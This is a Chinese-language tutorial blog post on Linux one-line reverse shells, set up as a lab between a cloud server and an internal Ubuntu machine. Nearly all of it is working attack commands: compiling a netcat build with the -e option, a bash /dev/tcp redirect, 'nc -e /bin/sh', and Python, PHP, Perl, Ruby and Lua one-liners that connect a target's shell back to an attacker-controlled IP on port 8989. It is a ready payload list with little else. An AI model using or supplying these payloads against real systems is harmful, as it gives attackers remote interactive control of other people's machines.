天天看點

linux一句話反彈shell

參考文獻:https://www.anquanke.com/post/id/87017

實驗環境:

阿裡雲伺服器:120.xxx.xxx.xx(開啟了8989端口)

内網ubuntu:192.xxx.xx.xxx(無外網ip不可直接通路)

安裝netcat

預設的各個linux發行版本已經自帶了

netcat工具包

,但是可能由于處于安全考慮原生版本的netcat帶有可以直接釋出與反彈本地shell的功能

參數 -e

這裡都被閹割了,是以需要手動下載下傳二進制安裝包。

下載下傳安裝包:
#wget https://nchc.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1.tar.gz --no-check-certifica
解壓:
#tar -xvzf netcat-0.7.1.tar.gz
編譯安裝:
/netcat-0.7.1# ./configure
/netcat-0.7.1# make
/netcat-0.7.1# make install
/netcat-0.7.1# make clean
           

1.使用bash指令反彈

1.1先在伺服器上監聽8989端口

nc -l -p 8989

1.2在目标機器上執行以下指令

bash -i >& /dev/tcp/120.xxx.xxx.xx/8989 0>&1
bash -i:産生一個bash互動環境
>&:将聯合符号前面的内容與後面相結合然後一起重定向給後者
/dev/tcp/120.xxx.xxx.xx/8989:讓攻擊方與目标主機建立tcp連結
0>&1:将`标準的輸入`與`标準輸出`内容相結合,然後重定向給前面`标準輸出`内容
           

2.使用nc反彈

2.1先在伺服器上監聽8989端口

nc -l -p 8989

2.2在目标機器上執行以下指令

nc -e /bin/sh 120.xxx.xxx.xx 8989

3.一句話反彈shell

3.1python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("120.xxx.xxx.xxx",8989));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
           

3.2php

php -r '$sock=fsockopen("120.xxx.xxx.xxx",8989);exec("/bin/sh -i <&3 >&3 2>&3");'
           

3.3perl

perl -e 'use Socket;$i="120.xxx.xxx.xxx";$p=8989;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
           

3.4ruby

ruby -rsocket -e'f=TCPSocket.open("120.xxx.xxx.xxx",8989).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
           

3.5lua

lua -e "require('socket');require('os');t=socket.tcp();t:connect('120.xxx.xxx.xxx','8989');os.execute('/bin/sh -i <&3 >&3 2>&3');"
           

繼續閱讀